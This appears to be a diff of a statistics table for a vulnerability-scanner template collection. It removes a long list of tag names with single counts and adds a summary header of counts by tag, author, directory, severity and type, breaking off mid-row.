nvrsolo | 1 | | | | | | | | | -| kingdee | 1 | | | | | | | | | -| casemanager | 1 | | | | | | | | | -| mystrom | 1 | | | | | | | | | -| contactossex | 1 | | | | | | | | | -| mastodon-tflnetpl | 1 | | | | | | | | | -| namedprocess | 1 | | | | | | | | | -| pandorafms | 1 | | | | | | | | | -| blind-ssrf | 1 | | | | | | | | | -| teespring | 1 | | | | | | | | | -| wolni-slowianie | 1 | | | | | | | | | -| 10web | 1 | | | | | | | | | -| telecom | 1 | | | | | | | | | -| tripadvisor | 1 | | | | | | | | | -| mflow | 1 | | | | | | | | | -| intellect | 1 | | | | | | | | | -| smartgateway | 1 | | | | | | | | | -| anyproxy | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| stackoverflow | 1 | | | | | | | | | -| naija-planet | 1 | | | | | | | | | -| art | 1 | | | | | | | | | -| xbox-gamertag | 1 | | | | | | | | | -| workcentre | 1 | | | | | | | | | -| hrsale | 1 | | | | | | | | | -| hookbot | 1 | | | | | | | | | -| darktrace | 1 | | | | | | | | | -| plausible | 1 | | | | | | | | | -| webtrees | 1 | | | | | | | | | -| ektron | 1 | | | | | | | | | -| dasan | 1 | | | | | | | | | -| cuteeditor | 1 | | | | | | | | | -| social-warfare | 1 | | | | | | | | | -| hostio | 1 | | | | | | | | | -| threads | 1 | | | | | | | | | -| iplanet | 1 | | | | | | | | | -| spx-php | 1 | | | | | | | | | -| caringbridge | 1 | | | | | | | | | -| onkyo | 1 | | | | | | | | | -| teltonika | 1 | | | | | | | | | -| theguardian | 1 | | | | | | | | | -| dmarc | 1 | | | | | | | | | -| wpb-show-core | 1 | | | | | | | | | -| snare | 1 | | | | | | | | | -| codementor | 1 | | | | | | | | | -| urlscan | 1 | | | | | | | | | -| bws-zendesk | 1 | | | | | | | | | -| twilio | 1 | | | | | | | | | -| karabin | 1 | | | | | | | | | -| sso | 1 | | | | | | | | | -| armorgames | 1 | | | | | | | | | -| eporner | 1 | | | | | | | | | -| gofile | 1 | | | | | | | | | -| knowage | 1 | | | | | | | | | -| docebo | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| timezone | 1 | | | | | | | | | -| raspberrymatic | 1 | | | | | | | | | -| freesound | 1 | | | | | | | | | -| overseerr | 1 | | | | | | | | | -| zenphoto | 1 | | | | | | | | | -| producthunt | 1 | | | | | | | | | -| ctflearn | 1 | | | | | | | | | -| treexml | 1 | | | | | | | | | -| librenms | 1 | | | | | | | | | -| shards | 1 | | | | | | | | | -| altenergy | 1 | | | | | | | | | -| rsi | 1 | | | | | | | | | -| msmswitch | 1 | | | | | | | | | -| batflat | 1 | | | | | | | | | -| admanager | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| isg | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| issabel | 1 | | | | | | | | | -| cloudconvert | 1 | | | | | | | | | -| verint | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| wowza | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| tablesome | 1 | | | | | | | | | -| gyra | 1 | | | | | | | | | -| pa11y | 1 | | | | | | | | | -| zwave | 1 | | | | | | | | | -| imgur | 1 | | | | | | | | | -| taringa | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| vr-calendar-sync | 1 | | | | | | | | | -| megamodelspl | 1 | | | | | | | | | -| gsoap | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| fusion | 1 | | | | | | | | | -| bitwarden | 1 | | | | | | | | | -| flahscookie | 1 | | | | | | | | | -| neo4j | 1 | | | | | | | | | -| elmah | 1 | | | | | | | | | -| owly | 1 | | | | | | | | | -| pagecdn | 1 | | | | | | | | | -| garagemanagementsystem | 1 | | | | | | | | | -| shoowbiz | 1 | | | | | | | | | -| cakephp | 1 | | | | | | | | | -| qmail | 1 | | | | | | | | | -| wp-fundraising-donation | 1 | | | | | | | | | -| clusterdafrica | 1 | | | | | | | | | -| openmediavault | 1 | | | | | | | | | -| cofense | 1 | | | | | | | | | -| tor | 1 | | | | | | | | | -| macos-bella | 1 | | | | | | | | | -| lucy | 1 | | | | | | | | | -| media-server | 1 | | | | | | | | | -| looker | 1 | | | | | | | | | -| flyway | 1 | | | | | | | | | -| cybrotech | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| nh | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| imagefap | 1 | | | | | | | | | -| bitrat | 1 | | | | | | | | | -| bws-linkedin | 1 | | | | | | | | | -| badgeos | 1 | | | | | | | | | -| ics | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| isg1000 | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| zenscrape | 1 | | | | | | | | | -| cytoid | 1 | | | | | | | | | -| kotburger | 1 | | | | | | | | | -| ui | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| gn-publisher | 1 | | | | | | | | | -| axiom | 1 | | | | | | | | | -| cryptocurrencies | 1 | | | | | | | | | -| zerobounce | 1 | | | | | | | | | -| kramer | 1 | | | | | | | | | -| finance | 1 | | | | | | | | | -| aerocms | 1 | | | | | | | | | -| quantum | 1 | | | | | | | | | -| mingyu | 1 | | | | | | | | | -| cheezburger | 1 | | | | | | | | | -| aspera | 1 | | | | | | | | | -| grandnode | 1 | | | | | | | | | -| supervisor | 1 | | | | | | | | | -| webeditors | 1 | | | | | | | | | -| charity | 1 | | | | | | | | | -| pendo | 1 | | | | | | | | | -| asanhamayesh | 1 | | | | | | | | | -| teddygirls | 1 | | | | | | | | | -| sporcle | 1 | | | | | | | | | -| ipdiva | 1 | | | | | | | | | -| championat | 1 | | | | | | | | | -| pinata | 1 | | | | | | | | | -| details | 1 | | | | | | | | | -| locations | 1 | | | | | | | | | -| inpost-gallery | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| opennebula | 1 | | | | | | | | | -| v2x | 1 | | | | | | | | | -| quasar | 1 | | | | | | | | | -| miracle | 1 | | | | | | | | | -| tappy | 1 | | | | | | | | | -| librephotos | 1 | | | | | | | | | -| epweb | 1 | | | | | | | | | -| redisinsight | 1 | | | | | | | | | -| soup | 1 | | | | | | | | | -| stytch | 1 | | | | | | | | | -| pendinginstallvzw | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| smtp2go | 1 | | | | | | | | | -| posthog | 1 | | | | | | | | | -| facturascripts | 1 | | | | | | | | | -| wpml | 1 | | | | | | | | | -| vivino | 1 | | | | | | | | | -| mcuuid-minecraft | 1 | | | | | | | | | -| brickset | 1 | | | | | | | | | -| fe | 1 | | | | | | | | | -| sogo | 1 | | | | | | | | | -| skyrock | 1 | | | | | | | | | -| discusselasticco | 1 | | | | | | | | | -| scrapingdog | 1 | | | | | | | | | -| fansly | 1 | | | | | | | | | -| hivequeue | 1 | | | | | | | | | -| cloudfront | 1 | | | | | | | | | -| siterecovery | 1 | | | | | | | | | -| twpro | 1 | | | | | | | | | -| hcommonssocial-mastodon-instance | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| tf2-backpack-examiner | 1 | | | | | | | | | -| asa | 1 | | | | | | | | | -| basic-auth | 1 | | | | | | | | | -| wpcentral | 1 | | | | | | | | | -| auxin-elements | 1 | | | | | | | | | -| storycorps | 1 | | | | | | | | | -| weixin | 1 | | | | | | | | | -| cowboys4angels | 1 | | | | | | | | | -| rsb | 1 | | | | | | | | | -| filr | 1 | | | | | | | | | -| envoy | 1 | | | | | | | | | -| mozilla | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| pfblockerng | 1 | | | | | | | | | -| prestashop-module | 1 | | | | | | | | | -| intelx | 1 | | | | | | | | | -| csz | 1 | | | | | | | | | -| runcloud | 1 | | | | | | | | | -| protocol | 1 | | | | | | | | | -| fox | 1 | | | | | | | | | -| mailhog | 1 | | | | | | | | | -| fiverr | 1 | | | | | | | | | -| ipfind | 1 | | | | | | | | | -| quip | 1 | | | | | | | | | -| websheets | 1 | | | | | | | | | -| oxid | 1 | | | | | | | | | -| easyscripts | 1 | | | | | | | | | -| boosty | 1 | | | | | | | | | -| ubisoft | 1 | | | | | | | | | -| packetstrom | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| vagrant | 1 | | | | | | | | | -| ticketmaster | 1 | | | | | | | | | -| cube105 | 1 | | | | | | | | | -| tracing | 1 | | | | | | | | | -| whmcs | 1 | | | | | | | | | -| imcat | 1 | | | | | | | | | -| gargoyle | 1 | | | | | | | | | -| stats | 1 | | | | | | | | | -| hashnode | 1 | | | | | | | | | -| acemanager | 1 | | | | | | | | | -| svg | 1 | | | | | | | | | -| soplanning | 1 | | | | | | | | | -| clearfy-cache | 1 | | | | | | | | | -| micro | 1 | | | | | | | | | -| geocaching | 1 | | | | | | | | | -| wbcecms | 1 | | | | | | | | | -| memory-pipes | 1 | | | | | | | | | -| guard | 1 | | | | | | | | | -| smokeping | 1 | | | | | | | | | -| clearbit | 1 | | | | | | | | | -| curcy | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| media | 1 | | | | | | | | | -| brandfolder | 1 | | | | | | | | | -| pkp-lib | 1 | | | | | | | | | -| silverback | 1 | | | | | | | | | -| lfw | 1 | | | | | | | | | -| ptr | 1 | | | | | | | | | -| captcha | 1 | | | | | | | | | -| fortnite-tracker | 1 | | | | | | | | | -| viper | 1 | | | | | | | | | -| form | 1 | | | | | | | | | -| fastvue | 1 | | | | | | | | | -| phoenix | 1 | | | | | | | | | -| easy-student-results | 1 | | | | | | | | | -| wmw | 1 | | | | | | | | | -| ampguard | 1 | | | | | | | | | -| cohost | 1 | | | | | | | | | -| hamaha | 1 | | | | | | | | | -| opgg | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| twitch | 1 | | | | | | | | | -| streamelements | 1 | | | | | | | | | -| treeview | 1 | | | | | | | | | -| musiciansocial-mastodon-instance | 1 | | | | | | | | | -| warriorforum | 1 | | | | | | | | | -| apigee | 1 | | | | | | | | | -| covalent | 1 | | | | | | | | | -| fatwire | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| kkFileview | 1 | | | | | | | | | -| jmeter | 1 | | | | | | | | | -| mastodon | 1 | | | | | | | | | -| apolloadminservice | 1 | | | | | | | | | -| oliver | 1 | | | | | | | | | -| flywheel | 1 | | | | | | | | | -| bws-visitors-online | 1 | | | | | | | | | -| admire-me | 1 | | | | | | | | | -| blogmarks | 1 | | | | | | | | | -| bws-xss | 1 | | | | | | | | | -| yahoo-japan-auction | 1 | | | | | | | | | -| historianssocial-mastodon-instance | 1 | | | | | | | | | -| eibiz | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| contact-form | 1 | | | | | | | | | -| bandlab | 1 | | | | | | | | | -| remedy | 1 | | | | | | | | | -| super-socializer | 1 | | | | | | | | | -| bun | 1 | | | | | | | | | -| tugboat | 1 | | | | | | | | | -| public | 1 | | | | | | | | | -| intelbras | 1 | | | | | | | | | -| open-redirect | 1 | | | | | | | | | -| g-auto-hyperlink | 1 | | | | | | | | | -| woocs | 1 | | | | | | | | | -| mojarra | 1 | | | | | | | | | -| pubsec | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| register | 1 | | | | | | | | | -| workspace | 1 | | | | | | | | | -| secure-copy-content-protection | 1 | | | | | | | | | -| peoplesoft | 1 | | | | | | | | | -| meteor | 1 | | | | | | | | | -| iucn | 1 | | | | | | | | | -| fotka | 1 | | | | | | | | | -| statistics | 1 | | | | | | | | | -| platformio | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| cnet | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| extreme | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| php-fusion | 1 | | | | | | | | | -| apteka | 1 | | | | | | | | | -| openid | 1 | | | | | | | | | -| appium | 1 | | | | | | | | | -| rcdevs | 1 | | | | | | | | | -| bws-social-login | 1 | | | | | | | | | -| chatgpt | 1 | | | | | | | | | -| justforfans | 1 | | | | | | | | | -| mkdocs | 1 | | | | | | | | | -| incapptic-connect | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| js-analyse | 1 | | | | | | | | | -| polarisft | 1 | | | | | | | | | -| revslider | 1 | | | | | | | | | -| hihello | 1 | | | | | | | | | -| discogs | 1 | | | | | | | | | -| veriz0wn | 1 | | | | | | | | | -| graphicssocial-mastodon-instance | 1 | | | | | | | | | -| hanime | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| tencent | 1 | | | | | | | | | -| report | 1 | | | | | | | | | -| mintme | 1 | | | | | | | | | -| ultras-diary | 1 | | | | | | | | | -| dicoogle | 1 | | | | | | | | | -| cube | 1 | | | | | | | | | -| manyvids | 1 | | | | | | | | | -| tenor | 1 | | | | | | | | | -| paytm | 1 | | | | | | | | | -| routers | 1 | | | | | | | | | -| uwumarket | 1 | | | | | | | | | -| pm43 | 1 | | | | | | | | | -| route | 1 | | | | | | | | | -| control | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| webcenter | 1 | | | | | | | | | -| bblog-ru | 1 | | | | | | | | | -| uid | 1 | | | | | | | | | -| wetransfer | 1 | | | | | | | | | -| ubuntu | 1 | | | | | | | | | -| mastodon-social-tchncs | 1 | | | | | | | | | -| iterable | 1 | | | | | | | | | -| disqus | 1 | | | | | | | | | -| stackhawk | 1 | | | | | | | | | -| psalm | 1 | | | | | | | | | -| filemage | 1 | | | | | | | | | -| zbiornik | 1 | | | | | | | | | -| ray | 1 | | | | | | | | | -| opentouch | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| isecure | 1 | | | | | | | | | -| flower | 1 | | | | | | | | | -| kemai | 1 | | | | | | | | | -| pcgamer | 1 | | | | | | | | | -| ovpn | 1 | | | | | | | | | -| latency | 1 | | | | | | | | | -| cryptobox | 1 | | | | | | | | | -| yazawaj | 1 | | | | | | | | | -| content-central | 1 | | | | | | | | | -| icq-chat | 1 | | | | | | | | | -| speakout | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| microsoft-technet-community | 1 | | | | | | | | | -| leadpages | 1 | | | | | | | | | -| cloudoa | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| forminator | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| b2bbuilder | 1 | | | | | | | | | -| pichome | 1 | | | | | | | | | -| huatian | 1 | | | | | | | | | -| nvrmini | 1 | | | | | | | | | -| smh | 1 | | | | | | | | | -| eurotel | 1 | | | | | | | | | -| homebridge | 1 | | | | | | | | | -| prvpl | 1 | | | | | | | | | -| vanguard | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| zaver | 1 | | | | | | | | | -| iws-geo-form-fields | 1 | | | | | | | | | -| appsmith | 1 | | | | | | | | | -| customize-login-image | 1 | | | | | | | | | -| contact-form-multi | 1 | | | | | | | | | -| openssl | 1 | | | | | | | | | -| musicstore | 1 | | | | | | | | | -| webtitan | 1 | | | | | | | | | -| nairaland | 1 | | | | | | | | | -| martech | 1 | | | | | | | | | -| masa | 1 | | | | | | | | | -| rdap | 1 | | | | | | | | | -| buddy | 1 | | | | | | | | | -| cargocollective | 1 | | | | | | | | | -| binaryedge | 1 | | | | | | | | | -| ddownload | 1 | | | | | | | | | -| nginxwebui | 1 | | | | | | | | | -| bscw | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| shoppable | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| hostuxsocial-mastodon-instance | 1 | | | | | | | | | -| sls | 1 | | | | | | | | | -| rudderstack | 1 | | | | | | | | | -| mspcontrol | 1 | | | | | | | | | -| openview | 1 | | | | | | | | | -| labstack | 1 | | | | | | | | | -| sunbird | 1 | | | | | | | | | -| carrdco | 1 | | | | | | | | | -| xhamster | 1 | | | | | | | | | -| chaturbate | 1 | | | | | | | | | -| rudloff | 1 | | | | | | | | | -| besu | 1 | | | | | | | | | -| 1001mem | 1 | | | | | | | | | -| diclosure | 1 | | | | | | | | | -| contact-form-entries | 1 | | | | | | | | | -| shortpixel-adaptive-images | 1 | | | | | | | | | -| mailman | 1 | | | | | | | | | -| fark | 1 | | | | | | | | | -| postcrossing | 1 | | | | | | | | | -| hackerearth | 1 | | | | | | | | | -| intel | 1 | | | | | | | | | -| poshmark | 1 | | | | | | | | | -| vero | 1 | | | | | | | | | -| udraw | 1 | | | | | | | | | -| questdb | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| image-optimizer-wd | 1 | | | | | | | | | -| shortcode | 1 | | | | | | | | | -| h5s | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| phpsec | 1 | | | | | | | | | -| shesfreaky | 1 | | | | | | | | | -| planon | 1 | | | | | | | | | -| elasticpot | 1 | | | | | | | | | -| hongjing | 1 | | | | | | | | | -| contentify | 1 | | | | | | | | | -| hackernoon | 1 | | | | | | | | | -| switching | 1 | | | | | | | | | -| orangescrum | 1 | | | | | | | | | -| couchsurfing | 1 | | | | | | | | | -| voice123 | 1 | | | | | | | | | -| jejapl | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| demotywatory | 1 | | | | | | | | | -| wix | 1 | | | | | | | | | -| archive-of-our-own-account | 1 | | | | | | | | | -| litmindclub-mastodon-instance | 1 | | | | | | | | | -| postnews | 1 | | | | | | | | | -| mx | 1 | | | | | | | | | -| homeworks | 1 | | | | | | | | | -| imagements | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| zipkin | 1 | | | | | | | | | -| macshell | 1 | | | | | | | | | -| debounce | 1 | | | | | | | | | -| fandalism | 1 | | | | | | | | | -| hugging-face | 1 | | | | | | | | | -| sterling | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| trino | 1 | | | | | | | | | -| datingru | 1 | | | | | | | | | -| verify | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| faspex | 1 | | | | | | | | | -| concrete5 | 1 | | | | | | | | | -| apim | 1 | | | | | | | | | -| opennms | 1 | | | | | | | | | -| crm-perks-forms | 1 | | | | | | | | | -| lightdash | 1 | | | | | | | | | -| codis | 1 | | | | | | | | | -| newgrounds | 1 | | | | | | | | | -| devrant | 1 | | | | | | | | | -| popup-maker | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| director | 1 | | | | | | | | | -| deeplink | 1 | | | | | | | | | -| universal | 1 | | | | | | | | | -| html2pdf | 1 | | | | | | | | | -| tracking | 1 | | | | | | | | | -| applezeed | 1 | | | | | | | | | -| learning-management-system | 1 | | | | | | | | | -| clockify | 1 | | | | | | | | | -| orbintelligence | 1 | | | | | | | | | -| beego | 1 | | | | | | | | | -| fontsy | 1 | | | | | | | | | -| cowrie | 1 | | | | | | | | | -| genie | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| geolocation | 1 | | | | | | | | | -| curiouscat | 1 | | | | | | | | | -| chaos | 1 | | | | | | | | | -| moneysavingexpert | 1 | | | | | | | | | -| roundcube | 1 | | | | | | | | | -| bws-updater | 1 | | | | | | | | | -| jspxcms | 1 | | | | | | | | | -| soa | 1 | | | | | | | | | -| bravia | 1 | | | | | | | | | -| cults3d | 1 | | | | | | | | | -| jasperreport | 1 | | | | | | | | | -| calendy | 1 | | | | | | | | | -| phpwind | 1 | | | | | | | | | -| oam | 1 | | | | | | | | | -| anobii | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| webshell4 | 1 | | | | | | | | | -| aryanic | 1 | | | | | | | | | -| keybase | 1 | | | | | | | | | -| cgit | 1 | | | | | | | | | -| netic | 1 | | | | | | | | | -| sanhui-smg | 1 | | | | | | | | | -| msmq | 1 | | | | | | | | | -| streamlabs | 1 | | | | | | | | | -| mysqld | 1 | | | | | | | | | -| giters | 1 | | | | | | | | | -| zenserp | 1 | | | | | | | | | -| kaes | 1 | | | | | | | | | -| somansa | 1 | | | | | | | | | -| artbreeder | 1 | | | | | | | | | -| cql | 1 | | | | | | | | | -| cocca | 1 | | | | | | | | | -| fudforum | 1 | | | | | | | | | -| pony | 1 | | | | | | | | | -| pettingzooco-mastodon-instance | 1 | | | | | | | | | -| currencyfreaks | 1 | | | | | | | | | -| xlight | 1 | | | | | | | | | -| telaen | 1 | | | | | | | | | -| harmony | 1 | | | | | | | | | -| flowcode | 1 | | | | | | | | | -| twisted | 1 | | | | | | | | | -| atvise | 1 | | | | | | | | | -| fuji | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| ransomware | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| strider | 1 | | | | | | | | | -| soloto | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| bentbox | 1 | | | | | | | | | -| omniampx | 1 | | | | | | | | | -| codekop | 1 | | | | | | | | | -| dnn | 1 | | | | | | | | | -| realtek | 1 | | | | | | | | | -| ghostcms | 1 | | | | | | | | | -| devexpress | 1 | | | | | | | | | -| void | 1 | | | | | | | | | -| fms | 1 | | | | | | | | | -| asgaros-forum | 1 | | | | | | | | | -| tapitag | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| psstaudio | 1 | | | | | | | | | -| tryhackme | 1 | | | | | | | | | -| yapishu | 1 | | | | | | | | | -| campaignmonitor | 1 | | | | | | | | | -| struts2 | 1 | | | | | | | | | -| erensoft | 1 | | | | | | | | | -| redv | 1 | | | | | | | | | -| alchemy | 1 | | | | | | | | | -| atlantis | 1 | | | | | | | | | -| member-hero | 1 | | | | | | | | | -| emerson | 1 | | | | | | | | | -| enterprise | 1 | | | | | | | | | -| xamr | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| vine | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| raspberry | 1 | | | | | | | | | -| slideshare | 1 | | | | | | | | | -| thinvnc | 1 | | | | | | | | | -| membership-database | 1 | | | | | | | | | -| coinlayer | 1 | | | | | | | | | -| automatisch | 1 | | | | | | | | | -| pcoweb | 1 | | | | | | | | | -| kivicare-clinic-management-system | 1 | | | | | | | | | -| xproxy | 1 | | | | | | | | | -| devalcms | 1 | | | | | | | | | -| extralunchmoney | 1 | | | | | | | | | -| minecraft-list | 1 | | | | | | | | | -| tinder | 1 | | | | | | | | | -| select-all-categories | 1 | | | | | | | | | -| helloprint | 1 | | | | | | | | | -| login-bypass | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| amp | 1 | | | | | | | | | -| mismatched | 1 | | | | | | | | | -| qibocms | 1 | | | | | | | | | -| phpmyfaq | 1 | | | | | | | | | -| cucm | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| kipin | 1 | | | | | | | | | -| etherscan | 1 | | | | | | | | | -| shindig | 1 | | | | | | | | | -| ocean-extra | 1 | | | | | | | | | -| joomsport-sports-league-results-management | 1 | | | | | | | | | -| ictprotege | 1 | | | | | | | | | -| snapdrop | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| duplicator | 1 | | | | | | | | | -| linear | 1 | | | | | | | | | -| c-lodop | 1 | | | | | | | | | -| jbzd | 1 | | | | | | | | | -| fhem | 1 | | | | | | | | | -| crypto | 1 | | | | | | | | | -| watchmyfeed | 1 | | | | | | | | | -| savepage | 1 | | | | | | | | | -| opensearch | 1 | | | | | | | | | -| nexusphp | 1 | | | | | | | | | -| watcher | 1 | | | | | | | | | -| girlfriendsmeet | 1 | | | | | | | | | -| buildkite | 1 | | | | | | | | | -| caa | 1 | | | | | | | | | -| patch | 1 | | | | | | | | | -| stestr | 1 | | | | | | | | | -| vironeer | 1 | | | | | | | | | -| kwejkpl | 1 | | | | | | | | | -| kaseya | 1 | | | | | | | | | -| incomcms | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| behance | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| contest-gallery | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| react | 1 | | | | | | | | | -| japandict | 1 | | | | | | | | | -| nas | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| vertex | 1 | | | | | | | | | -| patriots-win | 1 | | | | | | | | | -| onlinefarm | 1 | | | | | | | | | -| cve1028 | 1 | | | | | | | | | -| pdflayer | 1 | | | | | | | | | -| loancms | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| cafecito | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| mining | 1 | | | | | | | | | -| opera | 1 | | | | | | | | | -| maipu | 1 | | | | | | | | | -| zblog | 1 | | | | | | | | | -| scalar | 1 | | | | | | | | | -| digitalspy | 1 | | | | | | | | | -| xvideos-models | 1 | | | | | | | | | -| fuxa | 1 | | | | | | | | | -| hacker-news | 1 | | | | | | | | | -| saml | 1 | | | | | | | | | -| u5cms | 1 | | | | | | | | | -| verizon | 1 | | | | | | | | | -| tmdb | 1 | | | | | | | | | -| dotcards | 1 | | | | | | | | | -| wp-video-gallery-free | 1 | | | | | | | | | -| proxmox | 1 | | | | | | | | | -| tembosocial | 1 | | | | | | | | | -| livemasterru | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| flureedb | 1 | | | | | | | | | -| vklworld-mastodon-instance | 1 | | | | | | | | | -| chanjettplus | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| biotime | 1 | | | | | | | | | -| seeyon-oa | 1 | | | | | | | | | -| efak | 1 | | | | | | | | | -| zope | 1 | | | | | | | | | -| zillow | 1 | | | | | | | | | -| prototype | 1 | | | | | | | | | -| line | 1 | | | | | | | | | -| gmail | 1 | | | | | | | | | -| taskrabbit | 1 | | | | | | | | | -| rijksmuseum | 1 | | | | | | | | | -| system | 1 | | | | | | | | | -| eclipsebirt | 1 | | | | | | | | | -| smartertrack | 1 | | | | | | | | | -| libretoothgr-mastodon-instance | 1 | | | | | | | | | -| zerodium | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| bws-custom-search | 1 | | | | | | | | | -| qlik | 1 | | | | | | | | | -| composer | 1 | | | | | | | | | -| acf | 1 | | | | | | | | | -| pokerstrategy | 1 | | | | | | | | | -| flir-ax8 | 1 | | | | | | | | | -| teamspeak3 | 1 | | | | | | | | | -| conpot | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| navigate | 1 | | | | | | | | | -| khodrochi | 1 | | | | | | | | | -| ftp-backdoor | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| hubpages | 1 | | | | | | | | | -| bhagavadgita | 1 | | | | | | | | | -| mailmap | 1 | | | | | | | | | -| artstation | 1 | | | | | | | | | -| playable | 1 | | | | | | | | | -| cerber | 1 | | | | | | | | | -| siteengine | 1 | | | | | | | | | -| mastodon-climatejusticerocks | 1 | | | | | | | | | -| easyreport | 1 | | | | | | | | | -| blackduck | 1 | | | | | | | | | -| saltgui | 1 | | | | | | | | | -| accueil | 1 | | | | | | | | | -| pikabu | 1 | | | | | | | | | -| opencti | 1 | | | | | | | | | -| bunpro | 1 | | | | | | | | | -| controlled-admin-access | 1 | | | | | | | | | -| motioneye | 1 | | | | | | | | | -| calendar | 1 | | | | | | | | | -| tablereservation | 1 | | | | | | | | | -| blockfrost | 1 | | | | | | | | | -| postmark | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| newmeet | 1 | | | | | | | | | -| cashapp | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| trassir | 1 | | | | | | | | | -| interactsoftware | 1 | | | | | | | | | -| locklizard | 1 | | | | | | | | | -| vtiger | 1 | | | | | | | | | -| h5sconsole | 1 | | | | | | | | | -| sourceforge | 1 | | | | | | | | | -| apdisk | 1 | | | | | | | | | -| notion | 1 | | | | | | | | | -| activeadmin | 1 | | | | | | | | | -| v2924 | 1 | | | | | | | | | -| mi | 1 | | | | | | | | | -| h-sphere | 1 | | | | | | | | | -| txt | 1 | | | | | | | | | -| forms | 1 | | | | | | | | | -| maximo | 1 | | | | | | | | | -| mastoai | 1 | | | | | | | | | -| suitecrm | 1 | | | | | | | | | -| sling | 1 | | | | | | | | | -| ligeo | 1 | | | | | | | | | -| primefaces | 1 | | | | | | | | | -| wpa2 | 1 | | | | | | | | | -| netris | 1 | | | | | | | | | -| unibox | 1 | | | | | | | | | -| aceadmin | 1 | | | | | | | | | -| lgate | 1 | | | | | | | | | -| playsms | 1 | | | | | | | | | -| ab-map | 1 | | | | | | | | | -| streetview | 1 | | | | | | | | | -| anaqua | 1 | | | | | | | | | -| noptin | 1 | | | | | | | | | -| buymeacoffee | 1 | | | | | | | | | -| sliver | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| gift-voucher | 1 | | | | | | | | | -| linktree | 1 | | | | | | | | | -| rpcms | 1 | | | | | | | | | -| houzz | 1 | | | | | | | | | -| bing | 1 | | | | | | | | | -| lionwiki | 1 | | | | | | | | | -| rainloop | 1 | | | | | | | | | -| devto | 1 | | | | | | | | | -| jgraph | 1 | | | | | | | | | -| librespeed | 1 | | | | | | | | | -| debian | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| +| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 | +| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 | +| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | | +| xss | 848 | 